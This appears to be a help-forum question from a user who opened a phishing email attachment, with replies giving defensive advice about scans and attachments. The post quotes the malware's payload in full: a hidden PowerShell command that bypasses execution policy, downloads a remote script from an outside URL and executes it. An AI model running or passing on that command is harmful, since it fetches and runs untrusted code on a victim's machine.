# Opened Powershell Script by mistake

Tags: email, powershell, virus

Like a real IDIOT I opened a mail attachment that purported to be a link to delivery details on an Order I had placed.

Inside was a Short POWER SHELL Script - 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://clanmeeting.com/para/pam.ps1'));

Can some one assist and tell me how much "Merde" I am in.

Regards 
Mike

Comment: Determine what the script in question does then reverse the action.

Comment: Get good Internet Security software and do a full scan. Then you'll know how bad it is. If it's really bad, you may need to create an off-line disc to perform the analysis.

Comment: The file it tried to download (http://clanmeeting.com/para/pam.ps1) doesn't exist anymore.  So we can't look at it to tell you.

Comment: I know of absolutely no online stores that send you an mail attachment when you purchase something from them.  They normally just email you the receipt, and very rarely, wil send you to their website for a more detail receipt.  Do yourself a favor do not open random attachment unless you were expecting the attachment, know without a shadow of a doubt who sent the attachment, and have scanned the attachment.  I have never been infected with malware, because I don't open attachments, I have absolutely no reason to.

Comment: I'm not up to speed on powershell I'm afraif so do not know if any action taken or not.